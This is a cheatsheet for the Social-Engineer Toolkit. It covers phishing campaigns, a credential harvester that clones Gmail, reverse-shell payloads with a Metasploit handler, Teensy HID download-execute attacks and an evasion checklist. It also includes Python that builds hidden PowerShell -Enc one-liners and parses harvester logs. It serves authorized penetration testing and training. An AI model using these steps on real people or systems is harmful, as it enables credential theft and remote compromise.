Social-Engineer Toolkit (SET) Cheatsheet
The Social-Engineer Toolkit (SET) is an open-source penetration-testing framework built for social-engineering attacks. Developed by David Kennedy (ReL1K) and the TrustedSec team, SET automates a range of social-engineering attack vectors and gives assessors a single platform for testing the human element of an organisation's security.
Installation and Configuration
Installation on Kali Linux
# SET comes pre-installed on Kali Linux (package "set", installed under /usr/share/set)
setoolkit
# Update SET on Kali through the package manager
sudo apt update && sudo apt install --only-upgrade set
# If SET was installed from git instead, pull the latest source in the clone directory
cd /opt/set
git pull
Manual Installation
# Clone the repository
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
cd set/
# Install Python dependencies
pip3 install -r requirements.txt
# Run the installer (as root)
sudo python3 setup.py install
# Launch SET (the installer puts setoolkit on PATH; from the source tree use: sudo python3 setoolkit)
sudo setoolkit
Configuration
# Edit the configuration file (as root)
sudo nano /etc/setoolkit/set.config
# Key configuration options (KEY=VALUE, one per line):
# WEBATTACK_EMAIL=ON          # email an alert when a web attack captures credentials
# APACHE_SERVER=ON            # serve web attacks through Apache instead of SET's built-in web server
# METASPLOIT_PATH=/usr/share/metasploit-framework   # directory that contains msfconsole
# SENDMAIL=ON                 # send through a local MTA (sendmail/postfix), needed to spoof the From address
# EMAIL_PROVIDER=GMAIL        # provider used when sending through a webmail account instead
Main Menu Options
1) Social-Engineering Attacks
# Launch SET
setoolkit
# Select option 1 from main menu
# Social-Engineering Attacks submenu:
# 1) Spear-Phishing Attack Vectors
# 2) Website Attack Vectors
# 3) Infectious Media Generator
# 4) Create a Payload and Listener
# 5) Mass Mailer Attack
# 6) Arduino-Based Attack Vector
# 7) Wireless Access Point Attack Vector
# 8) QRCode Generator Attack Vector
# 9) Powershell Attack Vectors
# 10) Third Party Modules
Spear-Phishing Attack Vectors
# Option 1 from Social-Engineering Attacks
# Spear-Phishing submenu:
# 1) Perform a Mass Email Attack
# 2) Create a FileFormat Payload
# 3) Create a Social-Engineering Template
# Mass Email Attack
# - Configure SMTP settings
# - Import email list
# - Create or select email template
# - Attach malicious payload
# FileFormat Payload
# - Select file format (PDF, DOC, XLS, etc.)
# - Choose exploit
# - Generate malicious file
# Email Templates
# - Pre-built templates for common scenarios
# - Custom template creation
# - HTML email support
Website Attack Vectors
# Option 2 from Social-Engineering Attacks
# Website Attack submenu:
# 1) Java Applet Attack Method
# 2) Metasploit Browser Exploit Method
# 3) Credential Harvester Attack Method
# 4) Tabnabbing Attack Method
# 5) Web Jacking Attack Method
# 6) Multi-Attack Web Method
# 7) HTA Attack Method
# Credential Harvester
# - Clone legitimate websites
# - Capture credentials
# - Redirect after capture
# - Email harvested credentials
# Java Applet Attack
# - Self-signed Java applet
# - Social engineering prompt
# - Payload execution after acceptance
# Browser Exploit Method
# - Metasploit browser exploits
# - Automatic exploitation
# - Multiple exploit attempts
Attack Scenarios
Credential Harvesting
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 3) Credential Harvester Attack Method
# Harvester options:
# 1) Web Templates
# 2) Site Cloner
# 3) Custom Import
# Site Cloner example:
# Enter URL to clone: https://gmail.com
# SET clones the page and serves it locally (port 80 by default, so the attack host must be reachable on it)
# Each submission is printed to the SET console as it arrives and the victim is redirected to the real site
# Captured credentials saved to /root/.set/reports/ (~/.set/reports for the user running SET)
Phishing Email Campaign
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 1) Spear-Phishing Attack Vectors
# Select: 1) Perform a Mass Email Attack
# Configuration steps:
# 1) Select attack vector (fileformat, etc.)
# 2) Configure payload
# 3) Setup email template
# 4) Configure SMTP settings
# 5) Import target email list
# 6) Send campaign
# Email list format (emails.txt):
# user1@company.com
# user2@company.com
# user3@company.com
Infectious Media Generator
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 3) Infectious Media Generator
# Media options:
# 1) File-Format Exploits
# 2) Standard Metasploit Executable
# File-Format Exploits:
# - PDF exploits
# - Microsoft Office exploits
# - Browser-based exploits
# Standard Executable:
# - Windows executable
# - Linux executable
# - Mac OSX executable
PowerShell Attack Vectors
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 9) Powershell Attack Vectors
# PowerShell options:
# 1) PowerShell Alphanumeric Shellcode Injector
# 2) PowerShell Reverse Shell
# 3) PowerShell Bind Shell
# 4) PowerShell Dump SAM Database
# Reverse Shell example:
# Enter IP address for reverse connection
# Enter port for reverse connection
# Generate PowerShell command
# Execute on target system
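SET's PowerShell vectors hand you a one-liner to run on the target. The form PowerShell expects for `-EncodedCommand` is base64 over the UTF-16LE bytes of the script, not UTF-8, which is the usual mistake when a command is re-encoded by hand. The Python below is an added example, not SET's generator: it builds the encoded invocation with the switch set such one-liners typically use, and extracts and decodes the blob from a command line, which is the same step a responder takes to triage a `powershell -enc` entry in process-creation logs. The script text is a constructed benign stand-in for the generated shell; `encode_powershell`, `build_command_line` and `extract_encoded` are names chosen here.

```python
"""Encode and decode PowerShell -EncodedCommand one-liners (added example, not SET code)."""
import base64


def encode_powershell(script: str) -> str:
    """Return the -EncodedCommand form: base64 over UTF-16LE bytes, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    """Reverse of encode_powershell; raises on invalid base64 or a non-UTF-16LE payload."""
    return base64.b64decode(encoded, validate=True).decode("utf-16-le")


def build_command_line(script: str, hidden: bool = True) -> str:
    """Assemble the invocation the way SET-style one-liners do:
    no profile, non-interactive, execution policy bypassed, optionally hidden window."""
    flags = "-NoP -NonI -Exec Bypass"
    if hidden:
        flags += " -W Hidden"
    return f"powershell.exe {flags} -Enc {encode_powershell(script)}"


def extract_encoded(command_line: str):
    """Return the base64 argument following -EncodedCommand or any of its prefixes (-e, -ec, -enc, ...).

    PowerShell resolves switches by prefix, so the test is "is this token a prefix
    of -encodedcommand", not an exact match. -ExecutionPolicy (minimum prefix -ex)
    is not a prefix of -encodedcommand and is therefore not matched.
    """
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if len(t) >= 2 and "-encodedcommand".startswith(t):
            return tokens[i + 1]
    return None


# Constructed benign stand-in for the reverse-shell script SET would generate.
SAMPLE_SCRIPT = "Write-Output 'stand-in for the generated reverse shell'"

if __name__ == "__main__":
    cmd = build_command_line(SAMPLE_SCRIPT)
    print(cmd)
    print("decoded:", decode_powershell(extract_encoded(cmd)))
```

When triaging a suspicious entry, decode it before judging it: the encoded form hides the listener address and port that SET asked for in the steps above, and those are what you need for blocking and for correlating with network logs.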
Advanced Techniques
Custom Payloads
# Create custom payload
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 4) Create a Payload and Listener
# Payload options (names and numbering vary by SET version; read the menu SET prints):
# 1) Windows Shell Reverse_TCP
# 2) Windows Meterpreter Reverse_TCP
# 3) Windows Meterpreter Reverse_HTTP
# 4) Windows Meterpreter Reverse_HTTPS
# 5) Linux Shell Reverse_TCP
# Configuration:
# Set LHOST (attacker IP)
# Set LPORT (listening port)
# Generate payload
# Setup listener
Multi-Attack Web Method
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 6) Multi-Attack Web Method
# Combines multiple attack vectors:
# - Java Applet Attack
# - Metasploit Browser Exploit
# - Credential Harvester
# - Tabnabbing
# - Web Jacking
# Increases success probability
# Automatic fallback methods
# Comprehensive attack coverage
Arduino-Based Attacks
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 6) Arduino-Based Attack Vector
# Arduino attack types (names and numbering vary by SET version; read the menu SET prints):
# 1) Powershell HTTP GET MSF Payload
# 2) WSCRIPT HTTP GET MSF Payload
# 3) Powershell HTTP POST MSF Payload
# 4) WSCRIPT HTTP POST MSF Payload
# 5) Download-Execute Powershell Attack
# 6) Download-Execute WSCRIPT Attack
# Generates an Arduino sketch to flash onto a Teensy board
# Physical access to a USB port on the target is required
# The board enumerates as a USB keyboard (HID) and types the payload itself
# Works where autorun and removable-storage controls block a USB drive, because keyboard input is not filtered
Metasploit Integration
Configuring Metasploit Integration
# Configure Metasploit path in SET
nano /etc/setoolkit/set.config
# Set Metasploit path:
METASPLOIT_PATH=/usr/share/metasploit-framework
# Start a Metasploit handler for the payload SET generated (payload, LHOST and LPORT must match what SET used)
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST attacker_ip
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > set ExitOnSession false
msf6 exploit(multi/handler) > exploit -j
Automated Listener Setup
# SET can automatically setup Metasploit listeners
# When creating payloads, select:
# "Do you want to start the listener now? [y/n]:"
# Select 'y' for automatic listener setup
# SET will:
# 1) Generate appropriate payload
# 2) Start msfconsole
# 3) Configure handler
# 4) Start listener
Reporting and Logging
Credential Reports
# Harvested credentials location (~/.set/reports for the user running SET)
ls -la /root/.set/reports/
# View a captured-credential report (file names are timestamped, so quote the path)
cat "/root/.set/reports/2024-01-01 12:00:00.txt"
# Email reports (if configured)
# Automatic email notifications
# Real-time credential capture alerts
Attack Logs
# SET log files
/root/.set/logs/
# View attack logs
tail -f /root/.set/logs/set_logfile.log
# Apache access logs (for web attacks)
tail -f /var/log/apache2/access.log
# Email logs
tail -f /var/log/mail.log
Custom Reporting
# Generate custom reports by parsing the log files
# (the search strings below are assumptions about log wording; adjust them to what your SET version writes)
grep -i "credential" /root/.set/logs/set_logfile.log
# Extract IPv4 addresses and rank them by frequency
grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.set/logs/set_logfile.log | sort | uniq -c | sort -rn
# Count successful attacks
grep -ci "successful" /root/.set/logs/set_logfile.log
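With APACHE_SERVER=ON, every form submission to the cloned page appears in the Apache access log as a POST, so the access log is a second, independent record of harvester hits alongside SET's own report. The Python below is an added example, not SET code: it parses Apache combined-format lines, counts POST submissions per client, records the first and last submission time, and flags clients whose User-Agent is a command-line tool (scanner or sandbox traffic that would otherwise inflate the visitor count). The log lines are constructed; the request paths and status codes of a real run depend on the cloned site and SET version. `parse_line` and `summarise` are names chosen here.

```python
"""Summarise credential-harvester hits from an Apache access log (added example, not SET code)."""
import re
from collections import Counter
from datetime import datetime

# Constructed sample of /var/log/apache2/access.log (combined format); not a real capture.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [01/Jan/2024:12:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0)"
203.0.113.5 - - [01/Jan/2024:12:00:09 +0000] "POST / HTTP/1.1" 302 0 "http://198.51.100.10/" "Mozilla/5.0 (Windows NT 10.0)"
198.51.100.77 - - [01/Jan/2024:12:01:30 +0000] "GET / HTTP/1.1" 200 5120 "-" "curl/8.0.1"
203.0.113.9 - - [01/Jan/2024:12:02:15 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux)"
203.0.113.9 - - [01/Jan/2024:12:02:40 +0000] "POST / HTTP/1.1" 302 0 "http://198.51.100.10/" "Mozilla/5.0 (X11; Linux)"
203.0.113.5 - - [01/Jan/2024:12:03:00 +0000] "POST / HTTP/1.1" 302 0 "http://198.51.100.10/" "Mozilla/5.0 (Windows NT 10.0)"
this line is not a valid log entry
"""

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# User-Agent fragments that mark command-line tools rather than a victim's browser.
TOOL_UA_MARKERS = ("curl/", "wget/", "python-requests", "go-http-client", "nmap")


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = _LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def summarise(log_text):
    """Aggregate harvester activity: visitors, POSTs per IP, submission window, tool clients."""
    stats = {
        "requests": 0, "unparsed": 0,
        "visitors": set(), "tool_ips": set(),
        "posts_by_ip": Counter(),
        "first_post": None, "last_post": None,
    }
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        if rec is None:
            stats["unparsed"] += 1  # counted, not silently skipped, so a log-format change is noticed
            continue
        stats["requests"] += 1
        stats["visitors"].add(rec["ip"])
        if any(marker in rec["ua"].lower() for marker in TOOL_UA_MARKERS):
            stats["tool_ips"].add(rec["ip"])
        if rec["method"] == "POST":  # a form submission to the cloned page
            stats["posts_by_ip"][rec["ip"]] += 1
            t = rec["time"]
            if stats["first_post"] is None or t < stats["first_post"]:
                stats["first_post"] = t
            if stats["last_post"] is None or t > stats["last_post"]:
                stats["last_post"] = t
    return stats


if __name__ == "__main__":
    s = summarise(SAMPLE_ACCESS_LOG)
    humans = s["visitors"] - s["tool_ips"]
    print(f"{s['requests']} requests parsed, {s['unparsed']} unparsed")
    print(f"{len(humans)} human visitors, {len(s['posts_by_ip'])} submitted credentials")
    for ip, n in s["posts_by_ip"].most_common():
        print(f"  {ip}: {n} submission(s)")
    if s["first_post"]:
        print(f"submission window: {s['first_post']:%Y-%m-%d %H:%M:%S} to {s['last_post']:%H:%M:%S}")
```

Report the submission rate as `len(posts_by_ip)` over `len(visitors - tool_ips)`; in the sample, two of the two human visitors submitted and the curl client is excluded. A client that POSTs several times from the same IP (203.0.113.5 above) is one victim retrying, not several, which is why the per-IP counter rather than the raw POST count is the number to put in the report.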
Evasion Techniques
Email Evasion
# Domain reputation management
# Use legitimate email providers
# Gradual sending patterns
# Personalized content
# Email headers manipulation
# SPF/DKIM configuration
# Reply-to address spoofing
# Message threading
# Content evasion
# Image-based content
# URL shorteners
# Legitimate file hosting
Web Attack Evasion
# Domain fronting
# CDN utilization
# SSL/TLS encryption
# Legitimate hosting providers
# User-Agent rotation
# IP address rotation
# Traffic timing variation
# Legitimate referrer headers
# Content delivery
# Staged payloads
# Encrypted communications
# Legitimate file formats
Payload Evasion
# Encoding techniques
# Encryption methods
# Packing/compression
# Code obfuscation
# Delivery methods
# Legitimate file formats
# Trusted applications
# Signed executables
# Execution techniques
# Living off the land
# PowerShell alternatives
# Memory-only execution
Best Practices
Legal and Ethical Considerations
# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality
# Create engagement documentation
echo "Social Engineering Test Authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: Email addresses, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt
Operational Security
# Use dedicated infrastructure
# Implement proper logging
# Secure communication channels
# Regular backup procedures
# Infrastructure isolation
# Separate testing networks
# Dedicated email accounts
# Isolated web servers
# Data protection
# Encrypted storage
# Secure transmission
# Proper disposal
Testing Methodology
# Reconnaissance phase
# Target identification
# Information gathering
# Attack vector selection
# Execution phase
# Payload delivery
# Credential harvesting
# System compromise
# Post-exploitation
# Persistence establishment
# Data collection
# Evidence gathering
# Reporting phase
# Impact assessment
# Remediation recommendations
# Executive summary
Troubleshooting
Common Issues
# Email delivery problems
# Check SMTP configuration
# Verify DNS settings
# Test email connectivity
# Web server issues
# Check Apache configuration
# Verify port availability
# Test web connectivity
# Payload generation errors
# Verify Metasploit integration
# Check dependencies
# Update SET framework
# Permission issues
# Run as root user
# Check file permissions
# Verify directory access
Configuration Fixes
# Reset SET configuration
sudo rm /etc/setoolkit/set.config
setoolkit # Will recreate config on start; if it does not, re-run setup.py install from the SET source tree
# Update a git-installed SET framework
cd /opt/set
git pull
sudo python3 setup.py install
# Fix Apache issues
sudo systemctl restart apache2
sudo systemctl enable apache2
# Fix email issues
sudo systemctl restart postfix
sudo systemctl enable postfix